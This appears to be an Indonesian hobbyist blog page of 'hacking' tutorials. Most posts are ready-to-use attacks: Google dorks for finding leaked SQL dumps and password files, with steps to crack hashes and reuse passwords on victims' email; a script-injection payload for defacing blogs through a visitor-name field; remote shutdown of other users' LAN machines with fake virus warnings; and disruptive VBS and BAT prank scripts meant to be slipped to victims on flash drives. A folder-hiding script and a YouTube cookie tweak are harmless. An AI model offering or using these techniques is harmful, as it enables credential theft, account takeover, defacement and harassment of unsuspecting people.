Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Cara Mendapatkan Password Lewat Google

Google merupakan kumpulan dari berbagai informasi yang ada di internet. Ketika kita mau mencari informasi, kita lebih suka mencari lewat google. Dan tidak menutut kemungkinan ketika kita menggunakan kode-kode tertentu, maka data-data yang sifatnya private pun akan bisa kita akses.

Ini merupakan salah satu cara untuk mendapatkan password seseorang melalui google dengan menggunakan kode rahasia google yang sudah di jelaskan pada beberapa waktu lalu. Langsung saja, langkah-langkahnya seperti berikut:

1. Copy salah satu kode berikut ini.

ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e
ext:sql intext:"INSERT INTO" intext:@hotmail.com intextpassword
ext:sql intext:@hotmail.com intext:password
ext:sql intext:@hotmail.com
2. BukaGoogle dan paste salah satu code tadi.
3. Pilih salah satu website yang kita inginkan.

4. Cari script SQL yang ada tulisan username dan password, bisa menekan Ctrl + F untuk     mempercepat proses pencarian

5. Setelah ketemu, copy password yang di enkripsi dan buka alamat ini untuk     mendeskripsi password.

6. Untuk lebih enaknya carilah username yang menggunakan alamat email, biasanya     password yang dipakai juga akan sama dengan password emailnya. ^^

Semoga tutorial ini bisa bermanfaat untuk pembaca semuanya.


Baca Selengkapnya >>>
  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Cara Deface Blog

Ini merupakan tutorial sederhana yang di dapat ketika lagi browser di forum-forum yang biasa saya kunjungi. Ada banyak cara yang bisa didapatkan untuk deface suatu blog / website. Namun, pada kesempatan kali ini ada tutorial sederhana yang dibilang hanya bisa kita lihat hasil deface blog tersebut.

Berikut langkah-langkahnya :

1. Yang harus kita lakukan hanya mencari blog / website yang harus isi data pengunjung      sebelum membuka blog orang tersebut, misalnya blog ini.



2. Copy paste code berikut pada kotak nama yang tersedia
<script>document.body.innerHTML="<h1>Hacked By inoize</h1>
This Site Has been Defaced By : Jacka Santosa<br/>
Greetz To : All member Binus Hacker | Indonesian Area | Hacker Newbie <br/>
Visit http://jackasantosa.tk/";</script>


3. Hasil deface blog akan seperti berikut

Semoga bisa bermanfaat dan menghibur pembaca semua.^^


Baca Selengkapnya >>>
  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Cara Shutdown Komputer Orang Lain

Kadang kita merasa terganggu karena kehadiran user lain yang ada dalam 1 jaringan dan sering jail dengan komputer/laptop kita. Pada kesempatan kali ini saya akan memberi tutorial sederhana tentang bagaimana cara menshutdown atau restart komputer orang lain yang ada dalam 1 jaringan(biasanya LAN, kalau WAN kemungkinan bisa berhasil, bisa tidak)yang berbasis Windows.

Langsung saja langkah-langkahnya sebagai berikut:
1. Membuka Command Prompt

Pilih Start => All Programs => Accessories => Command Prompt
atau
Tekan Windows + R (Perintah Run) kemudian ketikkan cmd dan Enter

2. Mengetikkan perintah berikut
shutdown.exe -i

3. Akan muncul tampilan seperti berikut dan klik Add dan tulis nama komputer user yang     akan dijadikan target


4. Mengisi data pada Remote Shutdown Dialog


What do you want these computer to do : bisa diisi shutdown atau restart
Display warning for : lamanya waktu shutdown atau restart setelah [...] sekon. angka 30 menunjukkan 30 detik, dst.
Comment : diisi bebas, misalnya "Komputer anda terkena virus, dalam 30 detik akan mati dengan sendirinya!
5. Akan ada peringatan seperti berikut pada komputer korban


Bagaimana jika anda yang mengalami hal tersebut? Tidak usah khawatir, ada cara untuk mengembalikannya juga supaya komputer yang dishutdown atau restart tidak akan mati selama waktu yang diberikan masih tersedia. Caranya anda tinggal membuka Command Prompt seperti langkah pertama, kemudian ketikkan perintah
shutdown.exe -a

Semoga bisa bermanfaat dan saya mohon trik ini jangan dijadikan ajang untuk jahil / iseng kepada orang yang masih awam tentang komputer, kasian orangnya :D . Semoga bisa bermanfaat untuk pembaca semuanya.


Baca Selengkapnya >>>
  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Cara Mengganti Tampilan Youtube yang Baru

Munkin banyak dari pembaca yang belum tahu bahwa site Youtube akan mengubah tampilannya dengan gaya baru . Sebelum dirilis, alangkah baiknya kita bisa melihat dan menggunakannya terlebih dahulu.

Berikut ini langkah-langkah yang bisa kita gunakan untuk melakukan hacking Youtube site :

1. Membuka website Youtube
2. Ketikkan tombol berikut pada Keyboard berdasarkan web browser yang kita gunakan
Internet Explorer - F12
Mozilla Firefox - CTRL+SHIFT+K
Google Chrome - CTRL+SHIFT+J
Opera - CTRL+SHIFT+I
3. Copy paste script berikut ke kolom entry script
document.cookie="VISITOR_INFO1_LIVE=ST1Ti53r4fU";
4. Tekan tombol F5 pada keyboard untuk merefres browser.


tampilan youtube yang baru

Semoga bisa bermanfaat dan selamat mencoba


Baca Selengkapnya >>>
  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Tips Ngerjain Orang Lain dengan File *.VBS

Pada kesempatan kali ini saya akan memberikan tips cara mengerjain orang lain dengan file-file berekstensi *.VBS . Konsep dalam pembuatannya sama seperti file *.BAT yang sudah di jelaskan pada tutorial sebelumnya. Buka notepad anda dan copy pastekan file di bawah ini dan simpan dengan nama "TERSERAH.VBS" . Langsung saja berikut ada beberapa file yang bisa digunakan sesuai dengan keinginan pembaca.

1. Iseng Mengeject CD-Drive Terus Menerus

Set oWMP = CreateObject("WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

2. Iseng Dengan Tombol Enter Terus Menerus
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

3. Iseng Dengan Pesan Lambat Notepad "Hello,My Name Jacka. And You?"
WScript.Sleep 180
WScript.Sleep 1000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 1000
WshShell.AppActivate "Notepad"
WScript.Sleep 1000
WshShell.SendKeys "Hel"
WScript.Sleep 1000
WshShell.SendKeys "lo "
WScript.Sleep 1000
WshShell.SendKeys ",My "
WScript.Sleep 1000
WshShell.SendKeys "nam"
WScript.Sleep 1000
WshShell.SendKeys "e is "
WScript.Sleep 1000
WshShell.SendKeys "Jac"
WScript.Sleep 1000
WshShell.SendKeys "ka "
WScript.Sleep 1000
WshShell.SendKeys "San"
WScript.Sleep 1000
WshShell.SendKeys "to"
WScript.Sleep 1000
WshShell.SendKeys "sa"
WScript.Sleep 1000
WshShell.SendKeys " An"
WScript.Sleep 1000
WshShell.SendKeys "d Y"
WScript.Sleep 1000
WshShell.SendKeys "ou ?"

4. Iseng Dengan Backspace
MsgBox "Maaf, Anda Harus Mengulang Kembali"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

5. Iseng Dengan Keyboard
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Maaf, Keyboard Tidak Berfungsi! Harap Diperbaiki"
loop

Keterangan : masing-masing file bisa disimpan dengan nama GOKIL.VBS atau nama yang unik lainnya TERSERAHLOE.VBS trus kamu kasih temen lewat flashdisk atau yang lainnya agar dia tertarik untuk membukanya.

Jika file yang tersebut tidak bisa berjalan sebagaimana mestinya, kemungkinan kesalahan bisa terletak pada tanda petik dua "..." bisa di edit sendiri agar sesuai dengan notepad yang dipakai.


Baca Selengkapnya >>>
  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Tips Ngerjain Orang Lain dengan File *.BAT

Kadang kita ingin ngerjain orang lain karena lagi sebel, BT,atau mungkin hanya sekedar iseng-iseng saja. Nah, pada kesempatan kali ini saya ingin memberi tips untuk membuat aplikasi sederhada dengan ekstensi file *.bat . Kita hanya membutuhkan notepad untuk membuat aplikasi ini. Tinggal copy paste script berikut ke dalam notepad dan simpan di flashdisk temen kamu agar bisa di buka oleh korban.

1. Iseng dengan membuka calculator terus-menerus.

@ECHO off
:top
START calc.exe
GOTO top
Simpan dengan nama CALC.BAT atau nama terserah keinginan pembaca yang intinya bisa menarik orang lain untuk membukanya.

Keterangan : calc.exe bisa diganti dengan notepad.exe, SnippingTool.exe, dll.

2. Iseng dengan shutdown computer
@echo off
msg * Komputer Anda Terinfeksi Virus
shutdown -c "Error! Virus Menyebar Keseluruh System!" -s -t 0
simpan dengan nama keren.BAT

keterangan : angka 0 pada ujung bisa diganti dengan angka berapapun. Hitungannya dalam detik, 0 berarti 0 detik, dst.

Semoga kamu bisa puas ngerjain orang lain dan orang yang dikerjain bisa belajar ilmu yang sudah kamu dapat. :D


Baca Selengkapnya >>>
  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Cara Menyembunyikan Folder Tanpa Software

Sekarang sudah banyak aplikasi/software yang menyediakan layanan untuk menyembunyikan sebuah file dan folder. Tetapi tidak ada salahnya jika saya juga berbagi ilmu dalam menyembunyikan sebuah file dan folder tanpa aplikasi.

Walaupun masih ada kelemahannya, tetapi cara ini sangat bermanfaat untuk pembaca yang biasa menyembunyikan file penting seperti daily activity, dokumen rahasia, dll (pasti sudah tau lah :D). Anda bisa copy paste script / codingan berikut dalam sebuah notepad , WordPad, dll.

@ECHO OFF
title Folder rahasia
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST rahasia goto MDLOCKER
:CONFIRM
echo Are you sure want to lock the folder(Y/N)
set/p "cho=>"

if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren rahasia "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== PasswordSaya goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" rahasia
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md rahasia
echo rahasia created successfully
goto End
:End

kemudian save dengan nama rahasia.bat seperti berikut

Setelah selesai maka akan ada file rahasia.bat , kemudian klik 2x file tersebut dan akan muncul sebuah folder baru dengan nama rahasia. Anda bisa menyimpan file-file yang ingin anda sembunyikan dalam folder rahasia tersebut. Untuk menyembunyikan, anda tinggal klik file rahasia.bat dan ada perintah

Are you sure want to lock the folder(Y/N)
ketikkan Y untuk mengunci folder

maka folder tersebut akan disembunyikan, untuk menampilkan lagi cukup klik file rahasia.bat dan anda diminta untuk memasukkan password anda.

Enter password to unlock folder
Diisi dengan PasswordSaya
Semoga tutorial ini bisa bermanfaat untuk pembaca semuanya.


Baca Selengkapnya >>>
  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Kode Rahasia Google

Dalam pembahasan ini saya akan menjelaskan tentang beberapa trik menggunakan google agar lebih efisien dan bahkan juga bisa mendapatkan password orang lain lewat mesin pencari google ini.

Berikut ini ada beberapa istilah yang dapat digunakan untuk mendapatkan informasi yang lebih akurat sesuai dengan keinginan kita.

“ Intitle:”

ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yang dimaksud. Sebagai contoh pada pencarian, “intitle: password admin ” ( tanpa tanda kutip ). Pencarian akan mencari page yang mengandung kata ” password ” sebagai judulnya dengan prioritas utama “admin”. Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk pencarian secara lengkap. Sebagai contoh pada pencarian “allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu “admin” dan “mdb”.

” inurl:”

ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl : database mdb”. Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang “database mdb“. Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks “allinurl:” untuk mendapatkan list url tersebut. Sebagai contoh pencarian “allinurl: etc/passwd” , pencarian akan menghasilkan URL yang mengandung informasi tentang “etc” dan “passwd”. Tanda garis miring slash (”/”) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.

“site:”

ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: “waveguide site:politekniktelkom.ac.id” (tanpa tanda kutip). Pencarian akan mencari topic tentang waveguide pada semua halaman yang tersedia pada domain politeknitelkom.ac.id.

“cache:”

akan menunjukkan daftar web yang telah masuk kedalam indeks database Google. Sebagai contoh:“cache:deffcon.org”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org

“filetype:”

ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian : “filetype:doc site:go.id confidental” ( tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi “.doc” pada semua domain go.id yang berisi informasi “confidential”.

“link:”

ialah sintaks perintah pada Google yang akan menunjukkan daftar list webpages yang memiliki link pada webpage special. Sebagai contoh:”link:www.securityfocus.com” akan menunjuukan daftar webpage yang memiliki point link pada page SecurityFocus.

“related:”

sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan. Sebagai contoh: “related:www.securityfocus.com”, pencarian akan memberi daftar web page yang serupa dengan homepage Securityfocus.

“intext:”

sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh: “intext:admin” (tanpa tanda petik), pencarian akan menghasilkan link pada web page yang memiliki keyword admin.

Beberapa query sintaks diatas akan sangat membantu dalam pencarian data dan informasi lebih detail.

Google dapat menjadi mesin pencari untuk menggali informasi tertentu dan rahasia, informasi yang tidak diperkirakan yang dapat memberitahukan sisi lemah suatu sistem. Hal tersebut yang dimanfaatkan oleh sebagian individu untuk melakukan penetrasi suatu server atau sistem informasi .

Sintaks “Index of ” dapat digunakan untuk mendapatkan situs yang menampilkan indeks browsing direktori. Webserver dengan indeks browsing yang dapat diakses, berarti siapa saja dapat melakukan akses pada direktori webserver, seperti layaknya dapat dilakukan pada lokal direktori pada umumnya.

Pada kesempatan ini dipaparkan bagaimana penggunaan sintaks “index of” untuk mendapatkan hubungan pada webserver dengan direktori indeks browsing yang dapat diakses.. Hal tersebut merupakan sumber informasi yang sederhana dapat diperoleh, akan tetapi isi dari informasi seringkali merupakan informasi yang sangat penting. Informasi tersebut dapat saja berupa password akses atau data transaksi online dan hal yang sangat penting lainnya.

Dibawah ini merupakan beberapa contoh penggunaan sintaks ” indeks of” untuk mendapatkan informasi yang penting dan sensitive sifatnya. misalnya :

Index of /admin
Index of /passwd
Index of /password
Index of /mail
“Index of /” +passwd
“Index of /” +password.txt
“Index of /” +.htaccess
“Index of /secret”
“Index of /confidential”
“Index of /root”
“Index of /cgi-bin”
“Index of /credit-card”
“Index of /logs”
“Index of /config”
“Index of/admin.asp
“Index of/login.asp

Mencari sistem atau server yang vulnerable menggunakan sintaks “inurl:” atau “allinurl:”

1. Menggunakan sintaks “allinurl:winnt/system32/” (dengan tanda petik ) akan menampilkan daftar semua link pada server yang memberikan akses pada direktori yang terlarang seperti “system32″. Terkadang akan didapat akses pada cmd.exe pada direktori “system32″ yang memungkinkan seseorang untuk mengambil alih kendali sistem pada server tersebut.

2. Menggunakan “allinurl:wwwboard/passwd.txt” ( dengan tanda petik ) akan menampilkan daftar semua link pada server yang memiliki kelemahan pada “wwwboard Password”. Pembahasan lebih lanjut tentang vulnerability “wwwboard Password” dapat dilihat pada site keamanan jaringan seperti http://www.securityfocus.com atau http://www.securitytracker.com

3. Menggunakan sintaks “inurl: bash history” (dengan tanda petik ) akan menampilkan daftar link pada server yang memberikan akses pada file “bash history” melalui web. File tersebut merupakan command history file yang mengandung daftar perintah yang dieksekusi oleh administrator, yang terkadang menyangkut informasi sensitive seperti password sistem. Seringkali password pada sistem telah dienkripsi, untuk mendapatkan password aslinya bentuk yang dienkripsi ini harus didekripsi menggunakan program password cracker. Lama waktu untuk mendapatkan hasil dekripsi tergantung dari keandalan program dan banyaknya karakter yang terenkripsi.

4. Menggunakan “inurl:config.txt” (dengan tanda petik) akan menampilkan daftar semua link pada server yang memberikan akses pada file “config.txt. File ini berisi informasi penting termasuk hash value dari password administrator dan proses autentifikasi dari suatu database.

Sintaks “inurl:” atau “allinurl:” dapat dikombinasikan dengan sintaks yang lainnya seperti pada daftar dibawah ini :

Inurl: /cgi-bin/cart32.exe
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:”wwwroot/*.”
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php
inurl:gov filetype:xls “restricted”
index of ftp +.mdb allinurl:/cgi-bin/ +mailto allinurl:/scripts/cart32.exe allinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php
allinurl:/privmsg.php
allinurl:/privmsg.php
inurl:cgi-bin/go.cgi?go=*
allinurl:.cgi?page=*.txt
allinurul:/modules/My_eGallery

Mencari suatu sistem atau server yang memiliki kelemahan dengan sintaks “intitle:” atau “allintitle:”"

1. Menggunakan allintitle: \”index of /root? ( tanpa tanda kutip ) akan menampilkan Daftar link pada webserver yang memberikan akses pada direktori yang terlarang seperti direktori root.

2. Menggunakan allintitle: \”index of /admin? ( tanpa tanda kutip ) akan menampilkan link pada site yang memiliki indeks browsing yang dapat diakses untuk direktori terlarang seperti direktori ?admin?.

Penggunaan lain dari sintaks ?intitle:? atau ?allintitle:? yang dikombinasikan dengan sintaks lainnya antara lain :

intitle:\”Index of\” .sh_history
intitle:\”Index of\” .bash_history
intitle:\”index of\” passwd
intitle:\”index of\” people.lst
intitle:\”index of\” pwd.db
intitle:\”index of\” etc/shadow
intitle:\”index of\” spwd
intitle:\”index of\” master.passwd
intitle:\”index of\” htpasswd
intitle:\”index of\” members OR accounts
intitle:\”index of\” user_carts OR user_cart
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
allintitle:*.php?filename=*
allintitle:*.php?page=*
allintitle:*.php?logon=*

Penggunaan dan kombinasi pada sintaks tidak hanya terbatas pada contoh paparan diatas. Masih banyak lagi kombinasi dari sintaks sintaks dengan berbagai kata kunci yang dapat digunakan. Hal tersebut bergantung pada kreativitas dan kemauan untuk mencoba. Ada baiknya penggunaan wacana yang telah dipaparkan ini digunakan untuk kepentingan yang tidak menimbulkan kerugian atau kerusakan.

Kelemahan pada suatu sistem atau server yang diketahui ada baiknya dilakukan sharing dengan administrator sistem yang bersangkutan sehingga dapat bermanfaat bagi semua pihak. Dikarenakan kemungkinan besar hasil dari pencarian informasi dapat memberikan informasi yang sensitive, yang seringkali menyangkut segi keamanan suatu sistem atau server.

Wacana tentang sintaks yang sangat membantu dalam pencarian informasi tersebut akhirnya tergantung pada niat dan tujuan dalam pencarian data. Apakah sungguh sungguh dilakukan untuk kebutuhan pencarian data, mengumpulkan informasi dari suatu mesin target penetrasi. Tujuan akhirnya bergantung pada niat individu yang bersangkutan sehingga penulis tidak bertanggung jawab terhadap penyalahgunaan dari informasi yang telah dipaparkan. Seperti kata pepatah lama ? resiko ditanggung penumpang ?.


Baca Selengkapnya >>>
  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS